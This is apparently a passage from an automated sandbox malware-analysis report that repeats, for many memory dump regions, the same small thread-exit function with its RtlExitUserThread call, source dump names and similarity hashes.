                                                                                                            • Source File: 00000005.00000002.761090044.0000000003740000.00000040.00000001.sdmp, Offset: 03740000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01080000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01080023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760142506.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01180000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01180023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760188400.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05FD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05FD0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762635031.0000000005FD0000.00000040.00000001.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00FC0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00FC0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760103202.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05CD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05CD0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761694876.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05DD0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762444968.0000000005DD0000.00000040.00000001.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05ED0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05ED0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762529299.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05BD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05BD0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761642408.0000000005BD0000.00000040.00000001.sdmp, Offset: 05BD0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00EC0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00EC0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760062003.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BC0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00BC0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759931372.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00DC0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00DC0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760022993.0000000000DC0000.00000040.00000001.sdmp, Offset: 00DC0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 060D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 060D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762766440.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03510000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03510023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760959072.0000000003510000.00000040.00000001.sdmp, Offset: 03510000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05AD0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 05AD0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761594572.0000000005AD0000.00000040.00000001.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 061D0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 061D0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762933124.00000000061D0000.00000040.00000001.sdmp, Offset: 061D0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055A0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 055A0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761402286.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00C80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00C80023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759973097.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00D80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00D80023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760014349.0000000000D80000.00000040.00000001.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06090000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06090023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762741133.0000000006090000.00000040.00000001.sdmp, Offset: 06090000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06190000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 06190023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.762875565.0000000006190000.00000040.00000001.sdmp, Offset: 06190000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01280000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01280023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760239899.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03310000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03310023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760836415.0000000003310000.00000040.00000001.sdmp, Offset: 03310000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 056A0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 056A0023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.761444046.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00B80023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.759918980.0000000000B80000.00000040.00000001.sdmp, Offset: 00B80000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03410000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 03410023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760902988.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00E80023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760053880.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
                                                                                                            • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                                                                                            • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                                                                                            • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00F80000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 00F80023
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.760094634.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ExitThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3424019298-0
